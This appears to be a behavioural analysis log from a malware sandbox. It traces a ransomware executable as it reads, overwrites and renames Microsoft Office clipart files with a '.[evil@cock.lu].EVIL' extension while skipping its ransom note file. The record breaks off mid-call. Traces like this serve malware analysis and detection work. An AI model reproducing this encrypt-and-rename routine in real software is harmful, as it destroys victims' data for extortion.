1 [0136.155] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105328.WMF") returned 0x0 [0136.155] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF") returned 0x45 [0136.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0136.158] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f38, lpOverlapped=0x0) returned 1 [0138.017] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.017] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.017] _errno () returned 0x84b1160840 [0138.017] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.017] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0138.048] CloseHandle (hObject=0x1a8) returned 1 [0138.050] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.050] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.050] __uncaught_exception () returned 0x84b1160800 [0138.050] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.050] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf.[evil@cock.lu].evil")) returned 1 [0138.051] ??_V@YAXPEAX@Z () returned 0x1 [0138.054] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF", dwFileAttributes=0x200) returned 0 [0138.054] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.054] wcsstr (_Str="J0105332.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.054] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 69 [0138.054] wcscmp (_String1="J0105332.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.054] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105332.WMF") returned 0x0 [0138.054] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 0x45 [0138.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.055] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x290c, lpOverlapped=0x0) returned 1 [0138.119] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.119] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.119] _errno () returned 0x84b1160840 [0138.119] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.120] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2920, lpOverlapped=0x0) returned 1 [0138.120] CloseHandle (hObject=0x1a8) returned 1 [0138.120] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.120] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.120] __uncaught_exception () returned 0x84b1160800 [0138.120] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.121] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf.[evil@cock.lu].evil")) returned 1 [0138.129] ??_V@YAXPEAX@Z () returned 0x1 [0138.132] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF", dwFileAttributes=0x200) returned 0 [0138.132] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.132] wcsstr (_Str="J0105336.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.132] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 69 [0138.132] wcscmp (_String1="J0105336.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.132] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105336.WMF") returned 0x0 [0138.132] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 0x45 [0138.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.134] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb54, lpOverlapped=0x0) returned 1 [0138.168] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.168] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.168] _errno () returned 0x84b1160840 [0138.168] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.168] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb60, lpOverlapped=0x0) returned 1 [0138.168] CloseHandle (hObject=0x1a8) returned 1 [0138.168] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.169] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.169] __uncaught_exception () returned 0x84b1160800 [0138.169] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.169] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf.[evil@cock.lu].evil")) returned 1 [0138.170] ??_V@YAXPEAX@Z () returned 0x1 [0138.172] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF", dwFileAttributes=0x200) returned 0 [0138.173] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.173] wcsstr (_Str="J0105338.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.173] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 69 [0138.173] wcscmp (_String1="J0105338.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.173] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105338.WMF") returned 0x0 [0138.173] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 0x45 [0138.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.175] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d40, lpOverlapped=0x0) returned 1 [0138.191] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.191] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.191] _errno () returned 0x84b1160840 [0138.191] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.191] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d60, lpOverlapped=0x0) returned 1 [0138.191] CloseHandle (hObject=0x1a8) returned 1 [0138.191] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.191] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.191] __uncaught_exception () returned 0x84b1160800 [0138.192] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.192] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf.[evil@cock.lu].evil")) returned 1 [0138.192] ??_V@YAXPEAX@Z () returned 0x1 [0138.195] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF", dwFileAttributes=0x200) returned 0 [0138.195] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.196] wcsstr (_Str="J0105348.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.196] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 69 [0138.196] wcscmp (_String1="J0105348.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.196] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105348.WMF") returned 0x0 [0138.196] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 0x45 [0138.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x42a4, lpOverlapped=0x0) returned 1 [0138.262] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.262] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.262] _errno () returned 0x84b1160840 [0138.262] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.262] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x42c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x42c0, lpOverlapped=0x0) returned 1 [0138.262] CloseHandle (hObject=0x1a8) returned 1 [0138.262] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.262] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.262] __uncaught_exception () returned 0x84b1160800 [0138.262] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf.[evil@cock.lu].evil")) returned 1 [0138.263] ??_V@YAXPEAX@Z () returned 0x1 [0138.266] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF", dwFileAttributes=0x200) returned 0 [0138.266] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.266] wcsstr (_Str="J0105360.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 69 [0138.266] wcscmp (_String1="J0105360.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105360.WMF") returned 0x0 [0138.266] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 0x45 [0138.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.269] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x229c, lpOverlapped=0x0) returned 1 [0138.279] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.279] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.279] _errno () returned 0x84b1160840 [0138.279] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.279] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x22a0, lpOverlapped=0x0) returned 1 [0138.280] CloseHandle (hObject=0x1a8) returned 1 [0138.280] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.280] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.280] __uncaught_exception () returned 0x84b1160800 [0138.280] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.280] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf.[evil@cock.lu].evil")) returned 1 [0138.281] ??_V@YAXPEAX@Z () returned 0x1 [0138.284] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF", dwFileAttributes=0x200) returned 0 [0138.284] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.284] wcsstr (_Str="J0105368.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.284] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 69 [0138.284] wcscmp (_String1="J0105368.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.284] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105368.WMF") returned 0x0 [0138.284] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 0x45 [0138.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.286] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x305c, lpOverlapped=0x0) returned 1 [0138.305] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.305] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.305] _errno () returned 0x84b1160840 [0138.305] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.305] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3060, lpOverlapped=0x0) returned 1 [0138.305] CloseHandle (hObject=0x1a8) returned 1 [0138.305] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.305] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.305] __uncaught_exception () returned 0x84b1160800 [0138.305] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.306] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf.[evil@cock.lu].evil")) returned 1 [0138.306] ??_V@YAXPEAX@Z () returned 0x1 [0138.309] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF", dwFileAttributes=0x200) returned 0 [0138.310] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.310] wcsstr (_Str="J0105376.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.310] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 69 [0138.310] wcscmp (_String1="J0105376.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.310] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105376.WMF") returned 0x0 [0138.310] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 0x45 [0138.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.311] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1364, lpOverlapped=0x0) returned 1 [0138.381] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.381] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.381] _errno () returned 0x84b1160840 [0138.381] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.381] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0138.381] CloseHandle (hObject=0x1a8) returned 1 [0138.382] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.382] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.382] __uncaught_exception () returned 0x84b1160800 [0138.382] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.382] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf.[evil@cock.lu].evil")) returned 1 [0138.383] ??_V@YAXPEAX@Z () returned 0x1 [0138.386] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF", dwFileAttributes=0x200) returned 0 [0138.386] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.386] wcsstr (_Str="J0105378.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.386] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 69 [0138.386] wcscmp (_String1="J0105378.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.386] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105378.WMF") returned 0x0 [0138.386] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 0x45 [0138.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 